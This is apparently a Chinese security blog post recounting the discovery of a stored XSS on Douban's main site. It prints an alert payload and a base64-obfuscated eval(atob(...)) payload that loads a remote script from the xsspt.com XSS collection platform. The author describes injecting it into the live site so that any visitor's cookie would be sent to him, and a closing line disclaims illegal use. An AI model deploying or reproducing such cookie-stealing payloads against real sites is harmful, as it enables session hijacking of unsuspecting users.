我在机缘巧合下发现豆瓣主站存储型XSS

作者;南方有梦

圈子内的小大佬,叮咚信安核心成员,目前正在面壁思过中

0x00 缘起

2/19晚上十点左右,我在这一天”忙碌”的网课生活中解放出来。因为傍晚挖到联想的漏洞,想着既然它们在漏洞盒子有项目那么应该有自己的应急响应平台吧。

然后我尝试百度:联想应急响应

我一个个的打开,当我打开豆瓣的网站时。怦然心动;是这样的

以我的惊天地泣鬼神的反应力,直接梭哈提交漏洞盒子。

0x01 XSS因

我开始挖掘这个xss是如何产生的,一个快捷键:Ctrl + U打开了前端源代码查看

因为xss的弹窗无非就是alert(),confirm()和prompt()

我就本着习惯先去查看了alert

很快就找到了罪魁语句:

<img src=\"x\" onerror=\"alert('hello')\">然后我回到前端,查看是哪个用户插入的语句

开启我的F12,装逼功能(当然不是修改页面哈)

找到了真正的大佬

0x02 XSS果

我也满足一下自己的b格,给自己弹了一个b话十足的句子

于是呢,我就想着去xsspt创建项目,这样有人打开我就能梭哈一波了。

<img src=" https://xsspt.com/****** " onerror="alert('我是帅哥南方')">

当我插入的时候重新访问网站时候,平台并没有接收到我的cookie

我就想着是不是过滤了,于是呢

<img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwczovL3hzc3B0LmNvbS93UU5qUE4/JytNYXRoLnJhbmRvbSgp'))>

我们可以对自己的payload做些手脚

然后插入,刷新。

说明:

文章仅用于思路方法学习,请勿用于非法用途